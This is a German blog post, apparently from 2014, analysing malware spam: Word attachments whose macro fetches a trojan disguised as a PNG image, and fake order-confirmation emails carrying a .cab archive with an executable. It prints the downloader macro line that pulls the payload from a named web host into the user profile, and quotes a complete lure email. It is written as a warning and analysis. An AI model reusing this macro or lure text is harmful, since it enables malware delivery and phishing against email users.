Da wären zum einen die bekannten Microsoft Word Anhänge. Hier hat sich nur die Quelle des Trojaners geändert. Das eigentliche Schadprogramm wird jetzt als Bild im png-Format getarnt, wohl in der Hoffnung, dass ein Proxy-Server mit Virenschutz Bilder nicht prüft.
Sub YVFDXNTOHWT()
GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub
Die Datei (292352 Byte) wird als useradmin.com abgespeichert. Die ist etwas ungünstig, da COM-Programme auf 64-KByte beschränkt sind, tatsächlich handelt es sich jedoch um ein EXE-Programm, was an den beiden ersten Bytes „MZ“ zu erkennen ist.
Interessant ist, dass nach mehreren Stunden nur drei von 52 Antiviren-Programme die Domain carhiresoft.com als Malware-Site einstufen.
Die zweite Variante sendet ein cab-Archive, ein komprimiertes Dateiformat ähnlich zip, das hauptsächlich von Microsoft für Patches verwendet wird. Das CABinet enthält ein ausführbares Programm. Während der Absender sich im Text der Mail wiederfindet, sind die E-Mail Adressen geraten . Die Adressdatenbank der Spammer ist sehr dürftig. Bei mir kommen E-Mails mit Adressen an, die ich noch nie verwendet habe. Typisch sind z.B. sales@ oder homas@. Das fehelnde „t“ in „thomas“ deutet darauf hin, dass dem Spammer entweder ein Programmierfehler unterlaufen ist (Beginn der Zeichenkette bei 0 statt bei 1) oder die Datenbank einen Defekt hatte. [1]
To: „sales@arend-whv.de“ <sales@arend-whv.de>
Subject: Bestellen 210443928
X-Mailer: Cannibalise v6.6
Date: Mon, 16 Jun 2014 14:43:34 +0900
Wir danken Sie für die Benutzung unserer Dienstleistungen.
Ihre Bestellung #210443928 wird 28.06.2014 verschickt werden.
Transaktionsnummer: 8C715D01F608
Datum: 16.06.2014 07:28:45
Summe: €129.89
Bezahlungstyp: Banküberweisung
Die Gesamtrechnung werden Sie in der Datei rechnung735.cab aussuchen.
Hochachtungsvoll,
Izzet Sperling
+49 4221 7782 493
rechnung735.cab
Folgende weitere Absender fand ich im Postfach:
- Hermin Harnisch
+49 3441 3773 868 - Avcioglu Böning
+49 7152 8355 422
Der Name des Absenders im Header korrespondiert mit dem Namen des Absenders im Text; die Telefonnummern und Rechnungsdaten sind von E-Mail zu E-Mail verschieden. Insofern hat sich der Schreiber durchaus Mühe gegeben. Meine Hinweise hierzu scheinen auf fruchtbaren Boden zu fallen. 😉 Nur die täuschende Anrede fehlt dank der schlechten Adressdatenbank.
Der Trojaner ist eine Portable Anwendung; mehr dazu bei VirusTotal unter File detail.
- [1]Die genutzte Domain akzeptiert alles vor dem „@“ als gültigen Adresse, daher kommen diese Mails bis in mein Postfach.↩
Bei mir waren heute morgen noch alle Virenprogramme negativ. Mittlerweile zeigt mein GMail auch den Virus an und ich kann den Anhang nicht mehr herunterladen – heute morgen war das noch anders. Auch trudelt der Virus gerade bei allen Familienmitgliedern ein…
Insofern keine schlechte Leistung; den letzten infizierten Anhang hatte ich irgendwann vor 2005.